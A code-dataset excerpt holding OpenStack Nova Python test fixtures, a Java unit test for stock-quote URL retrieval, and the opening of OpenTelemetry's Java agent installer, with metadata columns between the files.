This also resets overrides for everything that is patched during
it's teardown.
"""
def __init__(self, **kwargs):
"""Constructor
:params group: if specified all config options apply to that group.
:params **kwargs: the rest of the kwargs are processed as a
set of key/value pairs to be set as configuration override.
"""
super(ConfPatcher, self).__init__()
self.group = kwargs.pop('group', None)
self.args = kwargs
def setUp(self):
super(ConfPatcher, self).setUp()
for k, v in self.args.items():
self.addCleanup(CONF.clear_override, k, self.group)
CONF.set_override(k, v, self.group)
class OSAPIFixture(fixtures.Fixture):
"""Create an OS API server as a fixture.
This spawns an OS API server as a fixture in a new greenthread in
the current test. The fixture has a .api parameter with is a
simple rest client that can communicate with it.
This fixture is extremely useful for testing REST responses
through the WSGI stack easily in functional tests.
Usage:
api = self.useFixture(fixtures.OSAPIFixture()).api
resp = api.api_request('/someurl')
self.assertEqual(200, resp.status_code)
resp = api.api_request('/otherurl', method='POST', body='{foo}')
The resp is a requests library response. Common attributes that
you'll want to use are:
- resp.status_code - integer HTTP status code returned by the request
- resp.content - the body of the response
- resp.headers - dictionary of HTTP headers returned
"""
def __init__(
self, api_version='v2', project_id=PROJECT_ID,
use_project_id_in_urls=False, stub_keystone=True,
):
"""Constructor
:param api_version: the API version that we're interested in
using. Currently this expects 'v2' or 'v2.1' as possible
options.
:param project_id: the project id to use on the API.
:param use_project_id_in_urls: If True, act like the "endpoint" in the
"service catalog" has the legacy format including the project_id.
:param stub_keystone: If True, stub keystonemiddleware and
NovaKeystoneContext to simulate (but not perform) real auth.
"""
super(OSAPIFixture, self).__init__()
self.api_version = api_version
self.project_id = project_id
self.use_project_id_in_urls = use_project_id_in_urls
self.stub_keystone = stub_keystone
def setUp(self):
super(OSAPIFixture, self).setUp()
# A unique hostname for the wsgi-intercept.
hostname = uuidsentinel.osapi_host
port = 80
service_name = 'osapi_compute'
endpoint = 'http://%s:%s/' % (hostname, port)
conf_overrides = {
'osapi_compute_listen': hostname,
'osapi_compute_listen_port': port,
'debug': True,
}
self.useFixture(ConfPatcher(**conf_overrides))
if self.stub_keystone:
self._stub_keystone()
# Turn off manipulation of socket_options in TCPKeepAliveAdapter
# to keep wsgi-intercept happy. Replace it with the method
# from its superclass.
self.useFixture(fixtures.MonkeyPatch(
'keystoneauth1.session.TCPKeepAliveAdapter.init_poolmanager',
adapters.HTTPAdapter.init_poolmanager))
loader = wsgi.Loader().load_app(service_name)
app = lambda: loader
# re-use service setup code from wsgi_app to register
# service, which is looked for in some tests
wsgi_app._setup_service(CONF.host, service_name)
intercept = interceptor.RequestsInterceptor(app, url=endpoint)
intercept.install_intercept()
self.addCleanup(intercept.uninstall_intercept)
base_url = 'http://%(host)s:%(port)s/%(api_version)s' % ({
'host': hostname, 'port': port, 'api_version': self.api_version})
if self.use_project_id_in_urls:
base_url += '/' + self.project_id
self.api = client.TestOpenStackClient(
'fake', base_url, project_id=self.project_id)
self.admin_api = client.TestOpenStackClient(
'admin', base_url, project_id=self.project_id)
# Provide a way to access the wsgi application to tests using
# the fixture.
self.app = app
def _stub_keystone(self):
# Stub out authentication middleware
# TODO(efried): Use keystonemiddleware.fixtures.AuthTokenFixture
self.useFixture(fixtures.MockPatch(
'keystonemiddleware.auth_token.filter_factory',
return_value=lambda _app: _app))
# Stub out context middleware
def fake_ctx(env, **kwargs):
user_id = env['HTTP_X_AUTH_USER']
project_id = env['HTTP_X_AUTH_PROJECT_ID']
is_admin = user_id == 'admin'
return context.RequestContext(
user_id, project_id, is_admin=is_admin, **kwargs)
self.useFixture(fixtures.MonkeyPatch(
'nova.api.auth.NovaKeystoneContext._create_context', fake_ctx))
class OSMetadataServer(fixtures.Fixture):
"""Create an OS Metadata API server as a fixture.
This spawns an OS Metadata API server as a fixture in a new
greenthread in the current test.
TODO(sdague): ideally for testing we'd have something like the
test client which acts like requests, but connects any of the
interactions needed.
"""
def setUp(self):
super(OSMetadataServer, self).setUp()
# in order to run these in tests we need to bind only to local
# host, and dynamically allocate ports
conf_overrides = {
'metadata_listen': '127.0.0.1',
'metadata_listen_port': 0,
'debug': True
}
self.useFixture(ConfPatcher(**conf_overrides))
self.metadata = service.WSGIService("metadata")
self.metadata.start()
self.addCleanup(self.metadata.stop)
self.md_url = "http://%s:%s/" % (
conf_overrides['metadata_listen'],
self.metadata.port)
class PoisonFunctions(fixtures.Fixture):
"""Poison functions so they explode if we touch them.
When running under a non full stack test harness there are parts
of the code that you don't want to go anywhere near. These include
things like code that spins up extra threads, which just
introduces races.
"""
def setUp(self):
super(PoisonFunctions, self).setUp()
try:
self._poison_libvirt_driver()
except ImportError:
# The libvirt driver uses modules that are not available
# on Windows.
if os.name != 'nt':
raise
def _poison_libvirt_driver(self):
# The nova libvirt driver starts an event thread which only
# causes trouble in tests. Make sure that if tests don't
# properly patch it the test explodes.
def evloop(*args, **kwargs):
import sys
warnings.warn("Forgot to disable libvirt event thread")
sys.exit(1)
# Don't poison the function if it's already mocked
import nova.virt.libvirt.host
if not isinstance(nova.virt.libvirt.host.Host._init_events, mock.Mock):
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.host.Host._init_events',
side_effect=evloop))
class IndirectionAPIFixture(fixtures.Fixture):
"""Patch and restore the global NovaObject indirection api."""
def __init__(self, indirection_api):
"""Constructor
:param indirection_api: the indirection API to be used for tests.
"""
super(IndirectionAPIFixture, self).__init__()
self.indirection_api = indirection_api
def cleanup(self):
obj_base.NovaObject.indirection_api = self.orig_indirection_api
def setUp(self):
super(IndirectionAPIFixture, self).setUp()
self.orig_indirection_api = obj_base.NovaObject.indirection_api
obj_base.NovaObject.indirection_api = self.indirection_api
self.addCleanup(self.cleanup)
class _FakeGreenThread(object):
def __init__(self, func, *args, **kwargs):
self._result = func(*args, **kwargs)
def cancel(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def kill(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def link(self, func, *args, **kwargs):
func(self, *args, **kwargs)
def unlink(self, func, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def wait(self):
return self._result
class SpawnIsSynchronousFixture(fixtures.Fixture):
"""Patch and restore the spawn_n utility method to be synchronous"""
def setUp(self):
super(SpawnIsSynchronousFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.utils.spawn_n', _FakeGreenThread))
self.useFixture(fixtures.MonkeyPatch(
'nova.utils.spawn', _FakeGreenThread))
class _FakeExecutor(futurist.SynchronousExecutor):
def __init__(self, *args, **kwargs):
# Ignore kwargs (example: max_workers) that SynchronousExecutor
# does not support.
super(_FakeExecutor, self).__init__()
class SynchronousThreadPoolExecutorFixture(fixtures.Fixture):
"""Make GreenThreadPoolExecutor synchronous.
Replace the GreenThreadPoolExecutor with the SynchronousExecutor.
"""
def setUp(self):
super(SynchronousThreadPoolExecutorFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'futurist.GreenThreadPoolExecutor', _FakeExecutor))
class BannedDBSchemaOperations(fixtures.Fixture):
"""Ban some operations for migrations"""
def __init__(self, banned_resources=None):
super(BannedDBSchemaOperations, self).__init__()
self._banned_resources = banned_resources or []
@staticmethod
def _explode(resource, op):
raise exception.DBNotAllowed(
'Operation %s.%s() is not allowed in a database migration' % (
resource, op))
def setUp(self):
super(BannedDBSchemaOperations, self).setUp()
for thing in self._banned_resources:
self.useFixture(fixtures.MonkeyPatch(
'sqlalchemy.%s.drop' % thing,
lambda *a, **k: self._explode(thing, 'drop')))
self.useFixture(fixtures.MonkeyPatch(
'sqlalchemy.%s.alter' % thing,
lambda *a, **k: self._explode(thing, 'alter')))
class ForbidNewLegacyNotificationFixture(fixtures.Fixture):
"""Make sure the test fails if new legacy notification is added"""
def __init__(self):
super(ForbidNewLegacyNotificationFixture, self).__init__()
self.notifier = rpc.LegacyValidatingNotifier
def setUp(self):
super(ForbidNewLegacyNotificationFixture, self).setUp()
self.notifier.fatal = True
# allow the special test value used in
# nova.tests.unit.test_notifications.NotificationsTestCase
self.notifier.allowed_legacy_notification_event_types.append(
'_decorated_function')
self.addCleanup(self.cleanup)
def cleanup(self):
self.notifier.fatal = False
self.notifier.allowed_legacy_notification_event_types.remove(
'_decorated_function')
class AllServicesCurrent(fixtures.Fixture):
def setUp(self):
super(AllServicesCurrent, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.Service.get_minimum_version_multi',
self._fake_minimum))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.service.get_minimum_version_all_cells',
lambda *a, **k: service_obj.SERVICE_VERSION))
compute_rpcapi.LAST_VERSION = None
def _fake_minimum(self, *args, **kwargs):
return service_obj.SERVICE_VERSION
class _NoopConductor(object):
def __getattr__(self, key):
def _noop_rpc(*args, **kwargs):
return None
return _noop_rpc
class NoopConductorFixture(fixtures.Fixture):
"""Stub out the conductor API to do nothing"""
def setUp(self):
super(NoopConductorFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.conductor.ComputeTaskAPI', _NoopConductor))
self.useFixture(fixtures.MonkeyPatch(
'nova.conductor.API', _NoopConductor))
class EventReporterStub(fixtures.Fixture):
def setUp(self):
super(EventReporterStub, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.compute.utils.EventReporter',
lambda *args, **kwargs: mock.MagicMock()))
class UnHelperfulClientChannel(privsep_daemon._ClientChannel):
def __init__(self, context):
raise Exception('You have attempted to start a privsep helper. '
'This is not allowed in the gate, and '
'indicates a failure to have mocked your tests.')
class PrivsepNoHelperFixture(fixtures.Fixture):
"""A fixture to catch failures to mock privsep's rootwrap helper.
If you fail to mock away a privsep'd method in a unit test, then
you may well end up accidentally running the privsep rootwrap
helper. This will fail in the gate, but it fails in a way which
doesn't identify which test is missing a mock. Instead, we
raise an exception so that you at least know where you've missed
something.
"""
def setUp(self):
super(PrivsepNoHelperFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_privsep.daemon.RootwrapClientChannel',
UnHelperfulClientChannel))
class PrivsepFixture(fixtures.Fixture):
"""Disable real privsep checking so we can test the guts of methods
decorated with sys_admin_pctxt.
"""
def setUp(self):
super(PrivsepFixture, self).setUp()
self.useFixture(fixtures.MockPatchObject(
nova.privsep.sys_admin_pctxt, 'client_mode', False))
class NoopQuotaDriverFixture(fixtures.Fixture):
"""A fixture to run tests using the NoopQuotaDriver.
We can't simply set self.flags to the NoopQuotaDriver in tests to use the
NoopQuotaDriver because the QuotaEngine object is global. Concurrently
running tests will fail intermittently because they might get the
NoopQuotaDriver globally when they expected the default DbQuotaDriver
behavior. So instead, we can patch the _driver property of the QuotaEngine
class on a per-test basis.
"""
def setUp(self):
super(NoopQuotaDriverFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch('nova.quota.QuotaEngine._driver',
nova_quota.NoopQuotaDriver()))
# Set the config option just so that code checking for the presence of
# the NoopQuotaDriver setting will see it as expected.
# For some reason, this does *not* work when TestCase.flags is used.
# When using self.flags, the concurrent test failures returned.
CONF.set_override('driver', 'nova.quota.NoopQuotaDriver', 'quota')
self.addCleanup(CONF.clear_override, 'driver', 'quota')
class DownCellFixture(fixtures.Fixture):
"""A fixture to simulate when a cell is down either due to error or timeout
This fixture will stub out the scatter_gather_cells routine and target_cell
used in various cells-related API operations like listing/showing server
details to return a ``oslo_db.exception.DBError`` per cell in the results.
Therefore it is best used with a test scenario like this:
1. Create a server successfully.
2. Using the fixture, list/show servers. Depending on the microversion
used, the API should either return minimal results or by default skip
the results from down cells.
Example usage::
with nova_fixtures.DownCellFixture():
# List servers with down cells.
self.api.get_servers()
# Show a server in a down cell.
self.api.get_server(server['id'])
# List services with down cells.
self.admin_api.api_get('/os-services')
"""
def __init__(self, down_cell_mappings=None):
self.down_cell_mappings = down_cell_mappings
def setUp(self):
super(DownCellFixture, self).setUp()
def stub_scatter_gather_cells(ctxt, cell_mappings, timeout, fn, *args,
**kwargs):
# Return a dict with an entry per cell mapping where the results
# are some kind of exception.
up_cell_mappings = objects.CellMappingList()
if not self.down_cell_mappings:
# User has not passed any down cells explicitly, so all cells
# are considered as down cells.
self.down_cell_mappings = cell_mappings
else:
# User has passed down cell mappings, so the rest of the cells
# should be up meaning we should return the right results.
# We assume that down cells will be a subset of the
# cell_mappings.
down_cell_uuids = [cell.uuid
for cell in self.down_cell_mappings]
up_cell_mappings.objects = [cell
for cell in cell_mappings
if cell.uuid not in down_cell_uuids]
def wrap(cell_uuid, thing):
# We should embed the cell_uuid into the context before
# wrapping since its used to calcualte the cells_timed_out and
# cells_failed properties in the object.
ctxt.cell_uuid = cell_uuid
return multi_cell_list.RecordWrapper(ctxt, sort_ctx, thing)
if fn is multi_cell_list.query_wrapper:
# If the function called through scatter-gather utility is the
# multi_cell_list.query_wrapper, we should wrap the exception
# object into the multi_cell_list.RecordWrapper. This is
# because unlike the other functions where the exception object
# is returned directly, the query_wrapper wraps this into the
# RecordWrapper object format. So if we do not wrap it will
# blow up at the point of generating results from heapq further
# down the stack.
sort_ctx = multi_cell_list.RecordSortContext([], [])
ret1 = {
cell_mapping.uuid: [wrap(cell_mapping.uuid,
db_exc.DBError())]
for cell_mapping in self.down_cell_mappings
}
else:
ret1 = {
cell_mapping.uuid: db_exc.DBError()
for cell_mapping in self.down_cell_mappings
}
ret2 = {}
for cell in up_cell_mappings:
ctxt.cell_uuid = cell.uuid
cctxt = context.RequestContext.from_dict(ctxt.to_dict())
context.set_target_cell(cctxt, cell)
result = fn(cctxt, *args, **kwargs)
ret2[cell.uuid] = result
return dict(list(ret1.items()) + list(ret2.items()))
@contextmanager
def stub_target_cell(ctxt, cell_mapping):
# This is to give the freedom to simulate down cells for each
# individual cell targeted function calls.
if not self.down_cell_mappings:
# User has not passed any down cells explicitly, so all cells
# are considered as down cells.
self.down_cell_mappings = [cell_mapping]
raise db_exc.DBError()
else:
# if down_cell_mappings are passed, then check if this cell
# is down or up.
down_cell_uuids = [cell.uuid
for cell in self.down_cell_mappings]
if cell_mapping.uuid in down_cell_uuids:
# its a down cell raise the exception straight away
raise db_exc.DBError()
else:
# its an up cell, so yield its context
cctxt = context.RequestContext.from_dict(ctxt.to_dict())
context.set_target_cell(cctxt, cell_mapping)
yield cctxt
self.useFixture(fixtures.MonkeyPatch(
'nova.context.scatter_gather_cells', stub_scatter_gather_cells))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell', stub_target_cell))
class AvailabilityZoneFixture(fixtures.Fixture):
"""Fixture to stub out the nova.availability_zones module
The list of ``zones`` provided to the fixture are what get returned from
``get_availability_zones``.
``get_instance_availability_zone`` will return the availability_zone
requested when creating a server otherwise the instance.availabilty_zone
or default_availability_zone is returned.
"""
def __init__(self, zones):
self.zones = zones
def setUp(self):
super(AvailabilityZoneFixture, self).setUp()
def fake_get_availability_zones(
ctxt, hostapi, get_only_available=False,
with_hosts=False, services=None):
# A 2-item tuple is returned if get_only_available=False.
if not get_only_available:
return self.zones, []
return self.zones
self.useFixture(fixtures.MonkeyPatch(
'nova.availability_zones.get_availability_zones',
fake_get_availability_zones))
def fake_get_instance_availability_zone(ctxt, instance):
# If the server was created with a specific AZ, return it.
reqspec = objects.RequestSpec.get_by_instance_uuid(
ctxt, instance.uuid)
requested_az = reqspec.availability_zone
if requested_az:
return requested_az
# Otherwise return the instance.availability_zone if set else
# the default AZ.
return instance.availability_zone or CONF.default_availability_zone
self.useFixture(fixtures.MonkeyPatch(
'nova.availability_zones.get_instance_availability_zone',
fake_get_instance_availability_zone))
class KSAFixture(fixtures.Fixture):
"""Lets us initialize an openstack.connection.Connection by stubbing the
auth plugin.
"""
def setUp(self):
super(KSAFixture, self).setUp()
self.mock_load_auth = self.useFixture(fixtures.MockPatch(
'keystoneauth1.loading.load_auth_from_conf_options')).mock
self.mock_load_sess = self.useFixture(fixtures.MockPatch(
'keystoneauth1.loading.load_session_from_conf_options')).mock
# For convenience, an attribute for the "Session" itself
self.mock_session = self.mock_load_sess.return_value
class OpenStackSDKFixture(fixtures.Fixture):
# This satisfies tests that happen to run through get_sdk_adapter but don't
# care about the adapter itself (default mocks are fine).
# TODO(efried): Get rid of this and use fixtures from openstacksdk once
# https://storyboard.openstack.org/#!/story/2005475 is resolved.
def setUp(self):
super(OpenStackSDKFixture, self).setUp()
self.useFixture(fixtures.MockPatch(
'openstack.proxy.Proxy.get_endpoint'))
real_make_proxy = service_description.ServiceDescription._make_proxy
_stub_service_types = {'placement'}
def fake_make_proxy(self, instance):
if self.service_type in _stub_service_types:
return instance.config.get_session_client(
self.service_type,
allow_version_hack=True,
)
return real_make_proxy(self, instance)
self.useFixture(fixtures.MockPatchObject(
service_description.ServiceDescription, '_make_proxy',
fake_make_proxy))
class HostNameWeigher(weights.BaseHostWeigher):
"""Weigher to make the scheduler host selection deterministic.
Note that this weigher is supposed to be used via
HostNameWeigherFixture and will fail to instantiate if used without that
fixture.
"""
def __init__(self):
self.weights = self.get_weights()
def get_weights(self):
raise NotImplementedError()
def _weigh_object(self, host_state, weight_properties):
# Any unspecified host gets no weight.
return self.weights.get(host_state.host, 0)
class HostNameWeigherFixture(fixtures.Fixture):
"""Fixture to make the scheduler host selection deterministic.
Note that this fixture needs to be used before the scheduler service is
started as it changes the scheduler configuration.
"""
def __init__(self, weights=None):
"""Create the fixture
:param weights: A dict of weights keyed by host names. Defaulted to
{'host1': 100, 'host2': 50, 'host3': 10}"
"""
if weights:
self.weights = weights
else:
# default weights good for most of the functional tests
self.weights = {'host1': 100, 'host2': 50, 'host3': 10}
def setUp(self):
super(HostNameWeigherFixture, self).setUp()
# Make sure that when the scheduler instantiate the HostNameWeigher it
# is initialized with the weights that is configured in this fixture
self.useFixture(fixtures.MockPatchObject(
HostNameWeigher, 'get_weights', return_value=self.weights))
# Make sure that the scheduler loads the HostNameWeigher and only that
self.useFixture(ConfPatcher(
weight_classes=[__name__ + '.HostNameWeigher'],
group='filter_scheduler'))
class GenericPoisonFixture(fixtures.Fixture):
POISON_THESE = (
(
'netifaces.interfaces',
'tests should not be inspecting real interfaces on the test node',
),
(
'os.uname',
'tests should not be inspecting host information on the test node',
),
)
def setUp(self):
def poison_configure(method, reason):
def fail(*a, **k):
raise Exception('This test invokes %s, which is bad (%s); you '
'should mock it.' % (method, reason))
return fail
super(GenericPoisonFixture, self).setUp()
for meth, why in self.POISON_THESE:
# attempt to mock only if not already mocked
location, attribute = meth.rsplit('.', 1)
components = location.split('.')
try:
current = __import__(components[0], {}, {})
for component in components[1:]:
current = getattr(current, component)
if not isinstance(getattr(current, attribute), mock.Mock):
self.useFixture(fixtures.MonkeyPatch(
meth, poison_configure(meth, why)))
except ImportError:
self.useFixture(fixtures.MonkeyPatch(
meth, poison_configure(meth, why)))
|
[] |
[] |
[
"OS_DEBUG"
] |
[]
|
["OS_DEBUG"]
|
python
| 1 | 0 | |
src/test/java/nitezh/ministock/utils/UrlDataToolsTests.java
|
package nitezh.ministock.utils;
import org.json.JSONObject;
import org.junit.Assume;
import org.junit.Test;
import java.io.IOException;
import static org.junit.Assert.assertEquals;
public class UrlDataToolsTests {
@Test
public void testDataRetrievalFromIex() throws IOException {
// SkipIf
Assume.assumeTrue(System.getenv("TRAVIS_CI") == null);
// Arrange
String url = "https://api.iextrading.com/1.0/stock/market/batch?symbols=aapl&types=quote";
// Act
String result = UrlDataTools.urlToString(url).substring(0, 33);
// Assert
String expected = "{\"AAPL\":{\"quote\":{\"symbol\":\"AAPL\"";
assertEquals(expected, result);
}
@Test
public void testGetCachedUrlData() throws Exception{
/*
// SkipIf
Assume.assumeTrue(System.getenv("TRAVIS_CI") == null);
// Arrange
String url = "https://api.iextrading.com/1.0/stock/market/batch?symbols=aapl&types=quote";
Cache cache = new Cache() {
@Override
protected JSONObject loadCache() {
return null;
}
@Override
protected void persistCache(JSONObject cache) {
}
};
//Act
String result = UrlDataTools.getCachedUrlData(url, cache, 300);
//Assert
String expected = "";
assertEquals(expected, result);
*/
}
}
|
[
"\"TRAVIS_CI\"",
"\"TRAVIS_CI\""
] |
[] |
[
"TRAVIS_CI"
] |
[]
|
["TRAVIS_CI"]
|
java
| 1 | 0 | |
javaagent-tooling/src/main/java/io/opentelemetry/javaagent/tooling/AgentInstaller.java
|
/*
* Copyright The OpenTelemetry Authors
* SPDX-License-Identifier: Apache-2.0
*/
package io.opentelemetry.javaagent.tooling;
import static io.opentelemetry.javaagent.bootstrap.AgentInitializer.isJavaBefore9;
import static io.opentelemetry.javaagent.tooling.SafeServiceLoader.load;
import static io.opentelemetry.javaagent.tooling.SafeServiceLoader.loadOrdered;
import static io.opentelemetry.javaagent.tooling.Utils.getResourceName;
import static net.bytebuddy.matcher.ElementMatchers.any;
import io.opentelemetry.context.Context;
import io.opentelemetry.context.ContextStorage;
import io.opentelemetry.context.Scope;
import io.opentelemetry.instrumentation.api.config.Config;
import io.opentelemetry.javaagent.bootstrap.AgentClassLoader;
import io.opentelemetry.javaagent.bootstrap.BootstrapPackagePrefixesHolder;
import io.opentelemetry.javaagent.bootstrap.ClassFileTransformerHolder;
import io.opentelemetry.javaagent.extension.AgentListener;
import io.opentelemetry.javaagent.extension.bootstrap.BootstrapPackagesConfigurer;
import io.opentelemetry.javaagent.extension.ignore.IgnoredTypesConfigurer;
import io.opentelemetry.javaagent.extension.instrumentation.InstrumentationModule;
import io.opentelemetry.javaagent.instrumentation.api.internal.InstrumentedTaskClasses;
import io.opentelemetry.javaagent.tooling.asyncannotationsupport.WeakRefAsyncOperationEndStrategies;
import io.opentelemetry.javaagent.tooling.bootstrap.BootstrapPackagesBuilderImpl;
import io.opentelemetry.javaagent.tooling.config.ConfigInitializer;
import io.opentelemetry.javaagent.tooling.ignore.IgnoredClassLoadersMatcher;
import io.opentelemetry.javaagent.tooling.ignore.IgnoredTypesBuilderImpl;
import io.opentelemetry.javaagent.tooling.ignore.IgnoredTypesMatcher;
import io.opentelemetry.javaagent.tooling.muzzle.AgentTooling;
import io.opentelemetry.javaagent.tooling.util.Trie;
import java.lang.instrument.Instrumentation;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Stream;
import java.util.stream.StreamSupport;
import javax.annotation.Nullable;
import net.bytebuddy.agent.builder.AgentBuilder;
import net.bytebuddy.agent.builder.ResettableClassFileTransformer;
import net.bytebuddy.description.type.TypeDefinition;
import net.bytebuddy.description.type.TypeDescription;
import net.bytebuddy.dynamic.DynamicType;
import net.bytebuddy.utility.JavaModule;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class AgentInstaller {
private static final Logger logger;
private static final String JAVAAGENT_ENABLED_CONFIG = "otel.javaagent.enabled";
// This property may be set to force synchronous AgentListener#afterAgent() execution: the
// condition for delaying the AgentListener initialization is pretty broad and in case it covers
// too much javaagent users can file a bug, force sync execution by setting this property to true
// and continue using the javaagent
private static final String FORCE_SYNCHRONOUS_AGENT_LISTENERS_CONFIG =
"otel.javaagent.experimental.force-synchronous-agent-listeners";
private static final String STRICT_CONTEXT_STRESSOR_MILLIS =
"otel.javaagent.testing.strict-context-stressor-millis";
private static final Map<String, List<Runnable>> CLASS_LOAD_CALLBACKS = new HashMap<>();
static {
LoggingConfigurer.configureLogger();
logger = LoggerFactory.getLogger(AgentInstaller.class);
addByteBuddyRawSetting();
// this needs to be done as early as possible - before the first Config.get() call
ConfigInitializer.initialize();
Integer strictContextStressorMillis = Integer.getInteger(STRICT_CONTEXT_STRESSOR_MILLIS);
if (strictContextStressorMillis != null) {
io.opentelemetry.context.ContextStorage.addWrapper(
storage -> new StrictContextStressor(storage, strictContextStressorMillis));
}
}
public static void installBytebuddyAgent(Instrumentation inst) {
logVersionInfo();
Config config = Config.get();
if (config.getBoolean(JAVAAGENT_ENABLED_CONFIG, true)) {
setupUnsafe(inst);
List<AgentListener> agentListeners = loadOrdered(AgentListener.class);
installBytebuddyAgent(inst, agentListeners);
} else {
logger.debug("Tracing is disabled, not installing instrumentations.");
}
}
/**
* Install the core bytebuddy agent along with all implementations of {@link
* InstrumentationModule}.
*
* @param inst Java Instrumentation used to install bytebuddy
* @return the agent's class transformer
*/
public static ResettableClassFileTransformer installBytebuddyAgent(
Instrumentation inst, Iterable<AgentListener> agentListeners) {
WeakRefAsyncOperationEndStrategies.initialize();
Config config = Config.get();
setBootstrapPackages(config);
runBeforeAgentListeners(agentListeners, config);
AgentBuilder agentBuilder =
new AgentBuilder.Default()
.disableClassFormatChanges()
.with(AgentBuilder.RedefinitionStrategy.RETRANSFORMATION)
.with(new RedefinitionDiscoveryStrategy())
.with(AgentBuilder.DescriptionStrategy.Default.POOL_ONLY)
.with(AgentTooling.poolStrategy())
.with(new ClassLoadListener())
.with(AgentTooling.locationStrategy(Utils.getBootstrapProxy()));
if (JavaModule.isSupported()) {
agentBuilder = agentBuilder.with(new ExposeAgentBootstrapListener(inst));
}
agentBuilder = configureIgnoredTypes(config, agentBuilder);
if (logger.isDebugEnabled()) {
agentBuilder =
agentBuilder
.with(AgentBuilder.RedefinitionStrategy.RETRANSFORMATION)
.with(new RedefinitionDiscoveryStrategy())
.with(new RedefinitionLoggingListener())
.with(new TransformLoggingListener());
}
int numberOfLoadedExtensions = 0;
for (AgentExtension agentExtension : loadOrdered(AgentExtension.class)) {
logger.debug(
"Loading extension {} [class {}]",
agentExtension.extensionName(),
agentExtension.getClass().getName());
try {
agentBuilder = agentExtension.extend(agentBuilder);
numberOfLoadedExtensions++;
} catch (Exception | LinkageError e) {
logger.error(
"Unable to load extension {} [class {}]",
agentExtension.extensionName(),
agentExtension.getClass().getName(),
e);
}
}
logger.debug("Installed {} extension(s)", numberOfLoadedExtensions);
ResettableClassFileTransformer resettableClassFileTransformer = agentBuilder.installOn(inst);
ClassFileTransformerHolder.setClassFileTransformer(resettableClassFileTransformer);
runAfterAgentListeners(agentListeners, config);
return resettableClassFileTransformer;
}
private static void setupUnsafe(Instrumentation inst) {
try {
UnsafeInitializer.initialize(inst, AgentInstaller.class.getClassLoader());
} catch (UnsupportedClassVersionError exception) {
// ignore
}
}
private static void setBootstrapPackages(Config config) {
BootstrapPackagesBuilderImpl builder = new BootstrapPackagesBuilderImpl();
for (BootstrapPackagesConfigurer configurer : load(BootstrapPackagesConfigurer.class)) {
configurer.configure(config, builder);
}
BootstrapPackagePrefixesHolder.setBoostrapPackagePrefixes(builder.build());
}
private static void runBeforeAgentListeners(
Iterable<AgentListener> agentListeners, Config config) {
for (AgentListener agentListener : agentListeners) {
agentListener.beforeAgent(config);
}
}
private static AgentBuilder configureIgnoredTypes(Config config, AgentBuilder agentBuilder) {
IgnoredTypesBuilderImpl builder = new IgnoredTypesBuilderImpl();
for (IgnoredTypesConfigurer configurer : loadOrdered(IgnoredTypesConfigurer.class)) {
configurer.configure(config, builder);
}
Trie<Boolean> ignoredTasksTrie = builder.buildIgnoredTasksTrie();
InstrumentedTaskClasses.setIgnoredTaskClassesPredicate(ignoredTasksTrie::contains);
return agentBuilder
.ignore(any(), new IgnoredClassLoadersMatcher(builder.buildIgnoredClassLoadersTrie()))
.or(new IgnoredTypesMatcher(builder.buildIgnoredTypesTrie()));
}
private static void runAfterAgentListeners(
Iterable<AgentListener> agentListeners, Config config) {
// java.util.logging.LogManager maintains a final static LogManager, which is created during
// class initialization. Some AgentListener implementations may use JRE bootstrap classes
// which touch this class (e.g. JFR classes or some MBeans).
// It is worth noting that starting from Java 9 (JEP 264) Java platform classes no longer use
// JUL directly, but instead they use a new System.Logger interface, so the LogManager issue
// applies mainly to Java 8.
// This means applications which require a custom LogManager may not have a chance to set the
// global LogManager if one of those AgentListeners runs first: it will incorrectly
// set the global LogManager to the default JVM one in cases where the instrumented application
// sets the LogManager system property or when the custom LogManager class is not on the system
// classpath.
// Our solution is to delay the initialization of AgentListeners when we detect a custom
// log manager being used.
// Once we see the LogManager class loading, it's safe to run AgentListener#afterAgent() because
// the application is already setting the global LogManager and AgentListener won't be able
// to touch it due to classloader locking.
boolean shouldForceSynchronousAgentListenersCalls =
Config.get().getBoolean(FORCE_SYNCHRONOUS_AGENT_LISTENERS_CONFIG, false);
if (!shouldForceSynchronousAgentListenersCalls
&& isJavaBefore9()
&& isAppUsingCustomLogManager()) {
logger.debug("Custom JUL LogManager detected: delaying AgentListener#afterAgent() calls");
registerClassLoadCallback(
"java.util.logging.LogManager", new DelayedAfterAgentCallback(config, agentListeners));
} else {
for (AgentListener agentListener : agentListeners) {
agentListener.afterAgent(config);
}
}
}
private static void addByteBuddyRawSetting() {
String savedPropertyValue = System.getProperty(TypeDefinition.RAW_TYPES_PROPERTY);
try {
System.setProperty(TypeDefinition.RAW_TYPES_PROPERTY, "true");
boolean rawTypes = TypeDescription.AbstractBase.RAW_TYPES;
if (!rawTypes) {
logger.debug("Too late to enable {}", TypeDefinition.RAW_TYPES_PROPERTY);
}
} finally {
if (savedPropertyValue == null) {
System.clearProperty(TypeDefinition.RAW_TYPES_PROPERTY);
} else {
System.setProperty(TypeDefinition.RAW_TYPES_PROPERTY, savedPropertyValue);
}
}
}
static class RedefinitionLoggingListener implements AgentBuilder.RedefinitionStrategy.Listener {
private static final Logger logger = LoggerFactory.getLogger(RedefinitionLoggingListener.class);
@Override
public void onBatch(int index, List<Class<?>> batch, List<Class<?>> types) {}
@Override
public Iterable<? extends List<Class<?>>> onError(
int index, List<Class<?>> batch, Throwable throwable, List<Class<?>> types) {
if (logger.isDebugEnabled()) {
logger.debug(
"Exception while retransforming {} classes: {}", batch.size(), batch, throwable);
}
return Collections.emptyList();
}
@Override
public void onComplete(
int amount, List<Class<?>> types, Map<List<Class<?>>, Throwable> failures) {}
}
static class TransformLoggingListener extends AgentBuilder.Listener.Adapter {
